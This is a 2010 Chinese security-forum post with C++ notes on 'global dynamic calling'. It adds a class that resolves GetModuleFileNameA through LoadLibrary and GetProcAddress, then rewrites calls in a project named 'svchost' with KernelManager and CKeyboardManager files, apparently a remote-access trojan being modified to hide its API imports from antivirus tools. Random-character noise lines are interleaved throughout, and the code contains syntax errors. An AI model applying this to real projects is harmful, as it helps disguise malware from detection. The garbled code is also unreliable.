标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
5 }& I: \' `9 T5 O3 o
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
# q. J) @& h" |: R4 |1 ~ [
----------------------------------------
3 t" g+ Z/ @0 T4 e& c
DTDY.h:
; n0 ^& ?+ ]/ l. t; W1 m
" o1 p) ~6 d% D! H! z, q% |7 d
#if _MSC_VER>1000
1 z/ D1 M' `4 I: B
#pragma once
, m& I9 i3 q. U5 o; D4 P% E
#endif //_MSC_VER>1000
+ l$ \; m1 J) Y# [
#include<windows.h>
$ S4 a" v) m4 h( I5 p5 [6 I# Z9 E
, x4 Y V& v) Z: p( j
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
; z) |, ]$ K- G, N" G6 ^
class DTDY
' \4 c1 D# T2 y; q, O) K; ?
{
5 x" h2 i" C+ X$ N O v
public:
. R" o6 i4 P$ z+ Q5 n v, p
DTDY();
; j2 g1 Q( A1 @2 C$ P$ U* B
virtual ~DTDY();
. a8 i6 q9 o+ j! D! C4 }% X8 i& T
public:
- z, G( r* y8 [: T$ d' ?* i
static pGetModuleFileNameA MyGetModuleFileName;
! r' S: |$ t; _ k; K# a
static BOOL FunInitiallization();
( `* E; I/ i) z5 J7 { @
};
: b/ g0 ?8 A, n- y, x J
#endif
2 @( a. N/ X- x7 {$ p* F
----------------------------------------
! Q. Z* e+ r0 M4 B) K
2 J4 `" _ ]' X4 J
DTDY.cpp:
+ m+ Y w1 N1 b4 x7 f
( j+ k6 `2 H3 a6 p" Q' T* i8 `
#include "DTDY.h"
1 T" Q4 n3 S% H( M, I( B
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
& ]# h Q7 D3 ~9 J8 M
DTDY:TDY()
" X5 o) F. f+ N- Q+ ~; }% A
{
- q( |% ~5 f2 V* q( ^
}
, G, S) \0 n7 O% a- k7 v4 ]
DTDY::~DTDY()
! T5 p& M7 N7 c4 w
{
p/ Z% O: c3 x9 J! E
}
: N$ j( T- I8 i/ r# k' [, r
BOOL DTDY::FunInitiallization()
5 c# i( {# w4 G. L8 K( x/ Q
{
6 Y2 Z# l/ A6 r& ^' g1 U
HMODULE hModule=LoadLibrary("kernel32.dll");
8 @% t# E T8 o2 u
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
' K5 E4 D( _4 F! Q/ y; k8 y
if(!MyGetModuleFileName=) return FALSE;
3 A6 D8 H2 ?/ m3 t/ I
) p3 C5 q: e! M( g5 Y5 [, R
return TRUE;
+ i/ v0 R$ N$ L0 M
}
/ Y" o; R x: Q" O7 N) Y
----------------------------------------
$ a* c ^6 M# L
svchost.cpp:
; t, E2 f1 _# R* @7 y
" V( l3 V$ I+ f- d) @. o+ j2 Q6 s
#include "DTDY.h"
* U; g. X- N3 {5 D: ^
9 S( M9 I y/ W
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
# k1 q# R" P8 t
{
4 G% L5 g4 F& \
switch(ul_reason_for_call)
4 N, h" o5 ]) H! g. R& ?6 u
{
; | F9 h# d( C, c0 O2 }0 r6 K
case DLL_PROCESS_ATTACH:
: v+ \# ?* X3 W
if(!DTDY::FunInitiallization()) return FALSE;
: R' a' _' P* I8 I9 a5 x
/ c3 z: h% ~( r! p; \
break;
, n4 P2 }: L! a
}
8 z% J' `1 p% Z& c
}
5 d$ U- K5 H P
5 {, A/ z. Y3 v/ L1 K R
& R- b' e% X( h) b! f9 K
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
. v! Z; z* f& e9 y m4 T# x
改写为
! |( \# G1 B* t9 i$ A3 c
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
0 }9 g9 }0 w' h* N
----------------------------------------
) A# x8 m5 P+ f, K. `
KernelManager.cpp:
7 x0 K/ j. P5 p2 L- l7 q5 m
: T% S- `: z- m4 \4 H* ]; u* T3 _/ y b: X
#include "../DTDY.h"
, l. b- j$ P' [
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
7 v/ V+ r9 m* J9 ^
改写为
! G6 D. v! Y! F$ `
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
; K) b: V6 |$ v0 h% N
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
